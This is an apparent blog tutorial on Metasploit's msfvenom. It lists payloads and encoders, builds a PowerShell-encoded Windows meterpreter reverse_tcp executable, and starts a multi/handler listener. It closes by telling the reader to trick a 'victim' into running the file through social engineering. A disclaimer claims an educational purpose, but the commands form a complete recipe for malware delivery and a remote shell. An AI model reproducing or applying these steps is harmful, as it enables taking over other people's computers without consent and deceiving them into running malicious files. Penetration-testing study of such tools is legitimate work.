
Mohammed Zain
3 min readApr 21, 2020


Disclaimer: This post is for research and educational purposes only. I do not take any responsibility, in regards to the actions taken by the readers of this article. Never attempt to hack a device for which you do not have the required permissions to do so.

This guide covers how to use msfvenom

What is msfvenom?

The Metasploit Framework has included tools like msfpayload and msfencode for quite sometime. These tools can be used to generate various types of payloads and encode them in various encoder modules. The tool msfvenom combines the functionality of msfpayload and msfencode into one.

It standardizes the command line options and makes it easier to generate payloads and encode them.

msfvenom command line
msfvenom command line

How to use msfvenom

List of payloads
list payloads

To see what all payloads msfvenom offers, you can do:

$ msfvenom -l payloads

This lists the available payloads that can be generated by msfvenom.

List of encoders
list encoders

To see what all encoders msfvenom offers, you can do:

$ msfvenom -l encoders

This lists the available encoders that can be used.

generating the payload
generating a payload

To generate a payload, you can do:

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=8080 -f exe -e cmd/powershell_base64 -o ~/payload.exe

This generates a reverse_tcp payload in an exe format with a powershell_base64 encoding and is outputted to the file payload.exe


Now we have setup a handler to listen to the payload and attempt to open a meterpreter session on the victim’s computer.

$ msfconsole

This will open the Metasploit Framework Console.


To setup the handler, you can do

msf5> use exploit/multi/handlermsf5> set PAYLOAD windows/meterpreter/reverse_tcpmsf5> set LHOST> set LPORT 8080msf5> exploit

This will start the handler that listens to the payload that we created earlier.

Now we have to get the victim to execute our malicious file that we created earlier using out social engineering skills and that should provide us with a meterpreter session.

Hack Complete.

